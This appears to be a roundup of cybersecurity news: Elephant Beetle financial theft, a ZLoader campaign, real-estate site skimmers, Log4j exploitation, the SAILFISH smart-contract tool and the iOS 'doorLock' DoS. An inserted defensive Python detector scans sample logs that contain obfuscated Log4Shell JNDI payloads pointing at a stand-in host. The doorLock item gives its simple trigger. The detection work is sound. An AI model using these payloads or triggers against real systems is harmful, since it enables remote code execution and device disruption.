Researchers Uncover Hacker Group Behind Organized Financial-Theft Operation

Cybersecurity researchers have taken the wraps off an organized financial-theft operation, undertaken by a discreet actor, that has targeted transaction processing systems and siphoned funds from entities primarily located in Latin America for at least four years.

The malicious hacking group has been codenamed Elephant Beetle by Israeli incident response firm Sygnia. Its intrusions target banks and retail companies: after an extensive study of the targets’ financial structures, it injects fraudulent transactions among benign activity to slip under the radar.

“The attack is relentless in its ingenious simplicity serving as an ideal tactic to hide in plain sight, without any need to develop exploits,” the researchers said in a report shared with The Hacker News, calling out the group’s overlaps with another tracked by Mandiant as FIN13, an “industrious” threat actor linked to data theft and ransomware attacks in Mexico stretching back as early as 2016.

Elephant Beetle is said to leverage an arsenal of no fewer than 80 unique tools and scripts to execute its attacks, while simultaneously taking steps to blend in with the victim’s environment over long periods to achieve its objectives.

“The unique modus operandi associated with the Elephant Beetle is their deep research and knowledge of victim’s financial systems and operations and their persistent search for vulnerable methods to technically inject financial transactions, ultimately leading to major financial theft,” Arie Zilberstein, vice president of incident response at Sygnia, told The Hacker News. “Given the long period of persistence this group has in victim’s networks, they often change and adapt their techniques and tooling to continue to be relevant.”

New Zloader Banking Malware Campaign Exploiting Microsoft Signature Verification

An ongoing ZLoader malware campaign has been uncovered exploiting remote monitoring tools and a nine-year-old flaw concerning Microsoft’s digital signature verification to siphon user credentials and sensitive information.

Israeli cybersecurity company Check Point Research, which has been tracking the sophisticated infection chain since November 2021, attributed it to a cybercriminal group dubbed MalSmoke, citing similarities with previous attacks.

“The techniques incorporated in the infection chain include the use of legitimate remote management software (RMM) to gain initial access to the target machine,” Check Point’s Golan Cohen said in a report shared with The Hacker News. “The malware then exploits Microsoft’s digital signature verification method to inject its payload into a signed system DLL to further evade the system’s defenses.”

A banking trojan at its core, ZLoader has been employed by many an attacker to steal cookies, passwords, and other private information from victims’ machines, not to mention gaining notoriety for acting as a distribution framework for Conti ransomware, according to an advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2021.

The campaign is said to have claimed 2,170 victims across 111 countries as of January 2, 2022, with most of the affected parties located in the U.S., Canada, India, Indonesia, and Australia. It’s also notable for the fact that it wraps itself in layers of obfuscation and other detection-evasion methods to elude discovery and analysis.

The attack flow commences with tricking users into installing a legitimate enterprise remote monitoring software called Atera, using it to upload and download arbitrary files as well as execute malicious scripts. However, the exact mode of distributing the installer file remains unknown as yet.

Hackers Target Real Estate Websites with Skimmer in Latest Supply Chain Attack

Threat actors leveraged a cloud video hosting service to carry out a supply chain attack on more than 100 real estate websites operated by Sotheby’s Realty that involved injecting malicious skimmers to steal sensitive personal information.

“The attacker injected the skimmer JavaScript codes into video, so whenever others import the video, their websites get embedded with skimmer codes as well,” Palo Alto Networks’ Unit 42 researchers said in a report published this week.

Skimmer attacks, also called formjacking, are a type of cyber attack in which bad actors insert malicious JavaScript code into a target website, most often into the checkout or payment pages of shopping and e-commerce portals, to harvest valuable information such as the credit card details entered by users.

Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities

Microsoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of security vulnerabilities uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems.

“Exploitation attempts and testing have remained high during the last weeks of December,” Microsoft Threat Intelligence Center (MSTIC) said in revised guidance published earlier this week. “We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.”

Publicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka Log4Shell, has emerged as a new attack vector for widespread exploitation by a variety of threat actors.

In the subsequent weeks, four more weaknesses in the utility have come to light — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — giving opportunistic bad actors persistent control over compromised machines and the means to mount an evolving array of attacks ranging from cryptocurrency miners to ransomware.

Even as the mass scanning attempts show no signs of letting up, attackers are working to evade string-matching detections by obfuscating the malicious HTTP requests. These requests are crafted so that Log4j writes them to a web request log, at which point the embedded JNDI lookup makes Log4j reach out to the attacker-controlled site.
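Because the obfuscation described above defeats a naive search for the literal string `${jndi:`, a detection has to normalize the request before matching. The following Python is an added example (not from Microsoft’s guidance or the report) that undoes percent-encoding and the common Log4j lookup tricks (`${lower:}`, `${upper:}`, and default-value lookups such as `${::-j}` or `${env:X:-j}`) and then scans constructed sample access-log lines for a JNDI lookup.

```python
"""Log4Shell detection helper: normalize Log4j lookup obfuscation, then match.
The access-log lines in SAMPLE_LOG are constructed for this example."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup followed by one of the protocol schemes Log4j JNDI can use.
_JNDI = re.compile(r"jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)", re.I)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j would for the lookups
    commonly used to spell out 'jndi' indirectly; keep anything else as-is."""
    key, _, arg = body.partition(":")
    key = key.strip().lower()
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if ":-" in arg:  # ${env:X:-j}, ${sys:X:-j}, ${::-j}: default value wins
        return arg.split(":-", 1)[1]
    return "${" + body + "}"  # jndi: and unknown lookups are left untouched


def normalize(text: str) -> str:
    """Undo (possibly repeated) URL encoding and nested lookups until stable."""
    for _ in range(3):  # double/triple percent-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(16):  # bounded so pathological input cannot loop forever
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_attempt(line: str) -> bool:
    """True when the normalized line contains a JNDI lookup with a scheme."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return only the log lines that carry a (possibly obfuscated) lookup."""
    return [line for line in lines if is_log4shell_attempt(line)]


SAMPLE_LOG = [  # constructed; 203.0.113.0/24 and .invalid are reserved for docs
    '203.0.113.5 - - [02/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Jan/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [02/Jan/2022:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://example.invalid/a}"',
    '203.0.113.11 - - [02/Jan/2022:10:01:22 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.13 - - [02/Jan/2022:10:01:30 +0000] "GET /?d=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):  # flags lines 2, 3 and 4; not the benign ${date:} line
        print("LOG4SHELL ATTEMPT:", hit)
```

The normalizer deliberately keeps unrecognised lookups in place, so a benign `${date:yyyy}` in a query string is not flagged while a `${upper:}`-spelled `jNdi:` still is.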

SAILFISH System to Find State-Inconsistency Bugs in Smart Contracts

A group of academics from the University of California, Santa Barbara, has demonstrated what it calls a “scalable technique” to vet smart contracts and mitigate state-inconsistency bugs, discovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs stored on the blockchain that are automatically executed when predetermined conditions are met based on the encoded terms of the agreement. They allow trusted transactions and agreements to be carried out between anonymous parties without the need for a central authority.

In other words, the code itself is meant to be the final arbiter of “the deal” it represents, with the program controlling all aspects of the execution, and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also means that vulnerabilities in the code could result in hefty losses, as evidenced by hacks aimed at the DAO and more recently, MonoX, where adversaries exploited loopholes to illicitly siphon funds, a scenario that could have catastrophic consequences given the burgeoning adoption of smart contracts over the past few years.

“Since smart contracts are not easily upgradable, auditing the contract’s source pre-deployment, and deploying a bug-free contract is even more important than in the case of traditional software,” the researchers detailed in a paper.

Researchers Detail New HomeKit ‘doorLock’ Bug Affecting Apple iOS

A persistent denial-of-service (DoS) vulnerability has been discovered in Apple’s iOS mobile operating system that’s capable of sending affected devices into a crash or reboot loop upon connecting to an Apple Home-compatible appliance.

The behavior, dubbed “doorLock,” is trivial in that it can be triggered by simply changing the name of a HomeKit device to a string larger than 500,000 characters.

This causes an iPhone or iPad that attempts to connect to the device to become unresponsive and enter an indefinite cycle of system failure and restart that can only be mitigated by restoring the affected device from Recovery or DFU (Device Firmware Update) Mode.

HomeKit is Apple’s software framework that allows iOS and iPadOS users to configure, communicate with, and control connected accessories and smart-home appliances using Apple devices.

“Any device with an affected iOS version installed that loads the string will be disrupted, even after rebooting,” security researcher Trevor Spiniolas said. “Restoring a device and signing back into the iCloud account linked to the HomeKit device will again trigger the bug.”
